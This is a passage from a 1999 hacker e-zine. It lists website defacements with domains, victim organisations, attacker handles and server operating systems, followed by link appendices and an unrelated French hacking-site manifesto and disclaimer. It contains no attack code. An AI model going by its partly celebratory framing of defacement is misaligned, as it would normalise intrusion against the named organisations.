      Site Title: Faculdade Santa Marta 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.faculdadesantamarta.br 
      Defaced by: The Death Knights 
      Operating System: Linux
      
      Previously Hacked
      Defaced domain: sony.com.pa
      Site Title: Sony Panama 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/sony.com.pa 
      Defaced by: Antichrist 
      Operating System: Windows NT
      Attrition comment: 2nd time defaced
      
      Defaced domain: www.ai-security.com
      Site Title: AI Security Inc 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.ai-security.com 
      Defaced by: g e n X h a k 
      Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6)
      
      Previously Hacked
      Defaced domain: www.monicalewinsky.com
      Site Title: Monica Lewinsky's Web site 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.monicalewinsky.com 
      Defaced by: un1x bowling t34m 
      Operating System: BSDI
      Attrition comment: 4th time defaced
      
      Defaced domain: www.nissan.com.mx
      Site Title: Nissan Mexico 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.nissan.com.mx 
      Defaced by: ytcracker 
      Operating System: Windows NT
      
      Previously Hacked
      Defaced domain: acquisition.jpl.nasa.gov
      Site Title: Jet Propulsion Labs NASA 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/acquisition.jpl.nasa.gov 
      Defaced by: JLM 
      Operating System: Windows NT (IIS/4.0)
      Attrition comment: Previously defaced on 99.10.26 by phreak.nl
      
      Defaced domain: www.whataburger.com
      Site Title: Whataburger Restaurants 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.whataburger.com 
      Defaced by: klept0 
      Operating System: Linux
      
      Defaced domain: www.asesor.com.pe 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.asesor.com.pe 
      Defaced by: xhostile/acidklown 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.spyconnection.com
      Site Title: Spy Connection 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.spyconnection.com 
      Defaced by: `defcon 
      Operating System: BSDI
      
      Defaced domain: www.wireless.ee
      Site Title: Phreak.nl 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.wireless.ee 
      Defaced by: Phreak.nl 
      Operating System: Windows 95
      
      Defaced domain: www.oab.org.br
      Site Title: Ordem dos Advogados do Brasil 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.oab.org.br 
      Defaced by: inferno.br 
      Operating System: Windows NT
      
      Defaced domain: www.fabrisia.com
      Site Title: Fabrisia Cronin 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.fabrisia.com 
      Defaced by: Analognet 
      Operating System: Linux
      
      Defaced domain: www.rayee.com
      Site Title: Rayee 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.rayee.com 
      Defaced by: Analognet 
      Operating System: BSDI
      
      Defaced domain: www.streamingcam.com
      Site Title: Straming Cam 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.streamingcam.com 
      Defaced by: Analognet 
      Operating System: BSDI
      
      Defaced domain: www.compunetcgi.com
      Site Title: Compunet Computer Group 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.compunetcgi.com 
      Defaced by: Evil Entity 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: whv1.warnervideo.com
      Site Title: Warner Home Video 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/whv1.warnervideo.com 
      Defaced by: etC 
      Operating System: Solaris 2.5.x (Netscape-Enterprise/2.0a)
      
      Defaced domain: www.dds.be 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.dds.be 
      Defaced by: sacudo69 
      Operating System: Irix (Rapidsite/Apa-1.3.4)
      
      Previously Hacked
      Defaced domain: www.hg.com.cn
      Site Title: HG China 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.hg.com.cn 
      Defaced by: kryptek 
      Operating System: Solaris
      Attrition comment: 2nd time defaced
      HIDDEN comments in the HTML.
      
      Previously Hacked
      Defaced domain: www.nukleer.gov.tr
      Site Title: Cekmece Nuclear Research and Training Center 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.nukleer.gov.tr 
      Defaced by: oystr-n-klam 
      Operating System: Linux
      Attrition comment: 2nd time defaced
      
      Defaced domain: www.latino-market.com
      Site Title: Millennium Computers 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.latino-market.com 
      Defaced by: p4riah 
      Operating System: WIndows NT
      
      Defaced domain: bodystore.nu 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/bodystore.nu 
      Defaced by: I.R.C. 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.investigationresources.com
      Site Title: Investigative Resources Agency 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.investigationresources.com 
      Defaced by: ytcracker 
      Operating System: Windows NT (IIS/4.0)
      Attrition comment: mass hack
      
      Previously Hacked
      Defaced domain: www.esdcinc.com
      Site Title: ESDC Inc 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.esdcinc.com 
      Defaced by: Floghe 
      Operating System: Windows NT
      
      Defaced domain: www.thomashosp.com
      Site Title: Thomas Hosp 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.thomashosp.com 
      Defaced by: w0lf 
      Operating System: Irix
      
      Defaced domain: www.lottoteam.de 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.lottoteam.de 
      Defaced by: r00tabega 
      Operating System: Irix (Rapidsite/Apa-1.3.4)
      
      Defaced domain: www.familyheartbeat.org
      Site Title: electr0n 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.familyheartbeat.org 
      Defaced by: electr0n 
      Operating System: BSDI
      
      Defaced domain: www.phifersystems.com
      Site Title: Phifer Systems, Inc. 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.phifersystems.com 
      Defaced by: ytcracker 
      Operating System: Linux
      
      Defaced domain: www.barat.edu
      Site Title: Barat College 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.barat.edu 
      Defaced by: phiber 
      Operating System: Windows NT
      
      Defaced domain: west.medicdata.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/west.medicdata.com 
      Defaced by: ytcracker 
      Operating System: Red Hat Linux (Apache 1.3.6)
      
      Defaced domain: www.car-4sale.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.car-4sale.com 
      Defaced by: ytcracker 
      Operating System: BSDI 3.0 (Apache 1.2.6)
      
      Defaced domain: tfcnews.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/tfcnews.com 
      Defaced by: Hate Inc 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.ahcg.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.ahcg.com 
      Defaced by: xhostile & acidklown 
      Operating System: MacOS (AppleShareIP/6.0.0)
      
      Defaced domain: www.globefilm.com.au
      Site Title: Globe Film 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.globefilm.com.au 
      Defaced by: xhostile & acidk|own 
      Operating System: Windows NT
      
      Defaced domain: www.calcapital.com
      Site Title: Cal Capital 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.calcapital.com 
      Defaced by: hV2k 
      Operating System: BSDI
      
      Defaced domain: stace.commed.ru
      Site Title: Commed Web Hosting 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/stace.commed.ru 
      Defaced by: ytcracker 
      Operating System: Linux
      
      Defaced domain: www.toystory2.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.toystory2.net 
      Defaced by: zeroc 
      Operating System: BSDI (Apache 1.3.6)
      
      Defaced domain: www.uni-net.co.uk 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.uni-net.co.uk 
      Defaced by: RETURN OF APOCALYPSE 
      Operating System: Solaris 2.6 - 2.7 (Apache 1.2.4)
      HIDDEN comments in the HTML.
      
      Previously Hacked
      Defaced domain: www.lottoteam.de
      Site Title: Lotto Team 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.lottoteam.de
      Defaced by: Fuby 
      Operating System: Irox
      Attrition comment: 2nd time defaced
      HIDDEN comments in the HTML.
      
      Defaced domain: www.m-hip.com
      Site Title: McDermit Combined Schools 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.m-hip.com 
      Defaced by: Fuby 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.pornography.com
      Site Title: Atlantis Management Group 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.pornography.com 
      Defaced by: Sploit 
      Operating System: Windows NT (IIS/4.0)
      
      Previously Hacked
      Defaced domain: tfcnews.com
      Site Title: TFC News 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/tfcnews.com 
      Defaced by: p4riah 
      Operating System: Windows NT (IIS/4.0)
      Attrition comment: Yes, it really was hacked.
      
      Defaced domain: unix.webgraphics.com
      Site Title: Worldwide Web Graphics 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/unix.webgraphics.com 
      Defaced by: Nitr0BurN 
      Operating System: Linux (Apache 1.3.4)
      
      Defaced domain: www.ivcsnet.net
      Site Title: Imperial Valley Computer Service 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.ivcsnet.net 
      Defaced by: p4riah 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: mars.assiniboinec.mb.ca 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/mars.assiniboinec.mb.ca 
      Defaced by: nitroburn 
      Operating System: Linux (Apache 1.2.6)
      
      Defaced domain: radius.preferred.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/radius.preferred.com 
      Defaced by: nitroburn 
      Operating System: Linux (Apache 1.3.3)
      
      Defaced domain: www.socioambiental.org
      Site Title: Instituto Socioambiental 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.socioambiental.org 
      Defaced by: c3zar 
      Operating System: Irix (Rapidsite/Apa-1.3.4)
      
      Defaced domain: www.optimumsettings.com
      Site Title: CEO Software, Inc 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.optimumsettings.com 
      Defaced by: wkD 
      Operating System: Linux (Apache/1.3.4)
      
      Defaced domain: coldwellbankerj-s.com
      Site Title: Coldwell Banker Justrom & Stromme 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/coldwellbankerj-s.com 
      Defaced by: DHC 
      Operating System: Linux (Apache 1.2.4)
      
      Defaced domain: www.themillcasino.com
      Site Title: The Mill Casino 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.themillcasino.com 
      Defaced by: DHC 
      Operating System: Linux (Apache 1.2.4)
      
      Defaced domain: www.pioneerimplement.com
      Site Title: Pioneer Implement 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.pioneerimplement.com 
      Defaced by: DHC 
      Operating System: Linux (Apache 1.2.4)
      
      Defaced domain: www.schedulerplus.com
      Site Title: CEO Software 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.schedulerplus.com 
      Defaced by: wkD 
      Operating System: Linux (Apache 1.3.4)
      
      Defaced domain: www.votedbest.com
      Site Title: Irmo News 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.votedbest.com 
      Defaced by: Uneek 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.indev.nic.in 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.indev.nic.in 
      Defaced by: c0rvus 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: beta.intuit.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/beta.intuit.com 
      Defaced by: Uneek Technologies 
      Operating System: Windows NT (WebSitePro/1.1h)
      
      Defaced domain: www.css.com
      Site Title: Consult Supply Support 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.css.com 
      Operating System: FreeBSD 2.2.1 - 3.0
      Attrition comment: Defacement implies site was RM'd
      
      Defaced domain: www.bhv.hn 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.bhv.hn 
      Defaced by: xhostile & acidklown 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.swoya.com
      Site Title: Boys & Girls Club of Southwestern Oregon 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.swoya.com 
      Defaced by: DHC 
      Operating System: Linux
      
      Defaced domain: www.mtb.gov.br
      Site Title: Ministerio do Trabalho e do Emprego 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.mtb.gov.br 
      Defaced by: inferno.br 
      Operating System: Windows NT
      
      Defaced domain: www.kdcq.com
      Site Title: K-Dock Oldies 93.5 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.kdcq.com 
      Defaced by: DHC 
      Operating System: Linux
      
      Defaced domain: www.trt6.gov.br 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.trt6.gov.br 
      Defaced by: Einstein 
      Operating System: WinNT
      
      Defaced domain: www.memphischamber.com
      Site Title: Towery Publishing 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.memphischamber.com 
      Defaced by: bansh33 and Analognet 
      Operating System: Irix

      Previously Hacked
      Defaced domain: www.salton-maxim.com
      Site Title: Samantha Dreimann 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.salton-maxim.com 
      Defaced by: p4riah 
      Operating System: WinNT
      
      Previously Hacked
      Defaced domain: www.hwa.net
      Site Title: Hoefer WYSOCKI Architects  
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.hwa.net 
      Defaced by: n4rfy 
      Operating System: WinNT
      
      Defaced domain: www.cuztom.com
      Site Title: Cuztom Incorporated 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.cuztom.com 
      Defaced by: cipher 
      Operating System: WinNT
      
      Defaced domain: www.ordsvy.gov.uk 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.ordsvy.gov.uk 
      Defaced by: Sarin 
      Operating System: Windows NT (IIS/4.0)
      HIDDEN comments in the HTML
      
      Defaced domain: www.nctsjax.navy.mil
      Site Title: Navy Computer and Telecommunications Station, Jacksonvile FLorida  
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.nctsjax.navy.mil 
      Defaced by: s01o and k-0s 
      Operating System: Windows NT
      
      Defaced domain: aoc.gov
      Site Title: The Architect of the United States Capitol 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/aoc.gov 
      Defaced by: Verb0 
      Operating System: Windows NT
      
      Defaced domain: cpma.apg.army.mil
      Site Title: Civilian Personnel Operations Center Management Agency 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/cpma.apg.army.mil 
      Defaced by: s01o and k-0s 
      Operating System: Windows NT
      
      Previously Hacked
      Defaced domain: www.learncomm.org
      Site Title: Kiel Woodward Associates 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.learncomm.org 
      Defaced by: DHC 
      Operating System: Irix
      
      Defaced domain: www.zetcom.ru
      Site Title: Zetcom 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.zetcom.ru 
      Defaced by: Z0omer 
      Operating System: Windows NT
      
      Previously Hacked
      Defaced domain: www.pietersburg.org.za 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.pietersburg.org.za 
      Defaced by: aKt0r & DajinX 
      Operating System: Windows NT (IIS/4.0)
      Attrition comment: Previously defaced on 99.09.18 by 139_r00ted - one of 11 .za domains hacked
      
      Previously Hacked
      Defaced domain: www.asesor.com.pe 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.asesor.com.pe 
      Defaced by: bean0 
      Operating System: Windows NT (IIS/4.0)
      Attrition comment: Previously defaced on 99.11.29 by acidkl0wn
      
      Defaced domain: www.colts.com
      Site Title: National Football League 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.colts.com 
      Defaced by: Tr1pl3 S31S 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.isaltda.com.uy 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.isaltda.com.uy 
      Defaced by: m0zy 
      Operating System: Windows NT (Lotus-Domino/Versin-4.6.3a)
      
      Defaced domain: www.ta-eng.com
      Site Title: TA Engineering 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.ta-eng.com 
      Defaced by: himi 
      Operating System: Windows NT (IIS/4.0)
       
 
        and more sites at the attrition cracked web sites mirror:

                     http://www.attrition.org/mirror/attrition/index.html 
 
       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________
       
       
       



  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites around the world:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://datatwirl.intranova.net  ** NEW **
      http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
      http://net-security.org/hwahaxornews ** NEW **
      http://www.sysbreakers.com/hwa ** NEW **
      http://www.attrition.org/hosted/hwa/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.hackunlimited.com/zine/hwa/ *UPDATED*
      http://www.ducktank.net/hwa/issues.html. ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW **
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa.*DOWN*
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://archives.projectgamma.com/zines/hwa/.  
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
      http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
      http://hwa.hax0r.news.8m.com/           
      http://www.fortunecity.com/skyscraper/feature/103/  
      

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondants and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://securax.org/cum/ *New address*

              
      
      Brasil........: http://www.psynet.net/ka0z              
            
                      http://www.elementais.cjb.net           
            
      Canada .......: http://www.hackcanada.com
      Croatia.......: http://security.monitor.hr
      
      Columbia......: http://www.cascabel.8m.com              
      
                      http://www.intrusos.cjb.net                                   
                      
      Finland ........http://hackunlimited.com/                
                      
      Germany ........http://www.alldas.de/
                      http://www.security-news.com/
      
      Indonesia.....: http://www.k-elektronik.org/index2.html 
      
                      http://members.xoom.com/neblonica/      
      
                      http://hackerlink.or.id/                
      
      Netherlands...: http://security.pine.nl/                
      
      Russia........: http://www.tsu.ru/~eugene/              
      
      Singapore.....: http://www.icepoint.com                 
      
      South Africa ...http://www.hackers.co.za       
                      http://www.hack.co.za            
                      http://www.posthuman.za.net 
 
                      
      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                                               and best security related e-zine.
      
                      
                       
                      
                      
                      
    .za (South Africa) sites contributed by wyzwun tnx guy...                  
      
      


    Got a link for this section? email it to hwa@press.usmc.net and i'll
    review it and post it here if it merits it.
   
    
      
    @HWA
    

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

     1998, 1999 (c) Cruciphux/HWA.hax0r.news  (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]    






Manifest
Le but de ce site est de mieux comprendre la sécurité informatique.
Un hacker par définition est une personne qui cherche à améliorer les systèmes d'information dans le seul et unique but de contribuer à la stabilité de ces systèmes!
La croyance populaire laisse entendre que les hackers sont des pirates.
C'est vrai. Mais il y a différents types de pirate.
Tout comme il y a différents types de personnes.
Les bavures courantes auxquelles on pense lorsqu'on évoque le terme de pirate informatique
seraient les hacks de compte msn, ordinateurs lâchement trojantés avec des exploits déjà tous faits
et encore peut-on classifier en tant que hack le fait de spammer
alors que depuis plus de 15 ans des scripts tous faits le font extrêmement bien?

Ce ne sont pas des hackers qui font ça!!!
Nous appelons ces gens des lammers! Quand ils sont mauvais,
ou des black hat lorsqu'ils sont doués dans la mise en application de leurs méfaits.
Aucun amour propre - Aucune dignité
Agissent par dégout, vengeance ou simple plaisir.
Les raisons peuvent être nombreuses et je ne prétends pas devoir juger qui que ce soit.
Je pense juste que l'on ne doit pas utiliser l'épée de fly pour commettre des injustices.
Il est 100 fois plus profitable d'améliorer un système que de marcher sur un château de sable... même si marcher sur un château de sable est rigolo :P
A vous de trouver votre amusement. ;)

Tu peux réagir sur la shootbox


Disclaimer Veuillez lire obligatoirement les règles ci-dessous avant de consulter ce site.
Conformément aux dispositions des différentes lois en vigueur, intrusions et maintenances frauduleuses sur un site, vol et / ou falsification de données.
Vous ne devez en aucun cas mettre en application les stratagèmes mis en place par ce site, qui sont présentés uniquement à titre d’éducation et de recherche dans le domaine de la protection de données.
Vous ne devez en aucun cas utiliser ce que vous aurez découvert, sauf si vous avez une autorisation écrite de l’administrateur d’un site ou que celui-ci vous ai ouvert un compte uniquement pour la recherche de failles.
Tout cela est interdit et illégal ne faites pas n'importe quoi.
Vous acceptez donc que l'administrateur de ce site n'est en aucun cas responsable d'aucun de vos actes. Sinon quittez ce site.
Vous êtes soumis à ce disclaimer.
ET À CE TITRE, NI LA COMMUNAUTÉ, NI L'ADMINISTRATEUR, NI L'HÉBERGEUR, NE POURRONT, NI NE SERONT RESPONSABLE DE VOS ACTES.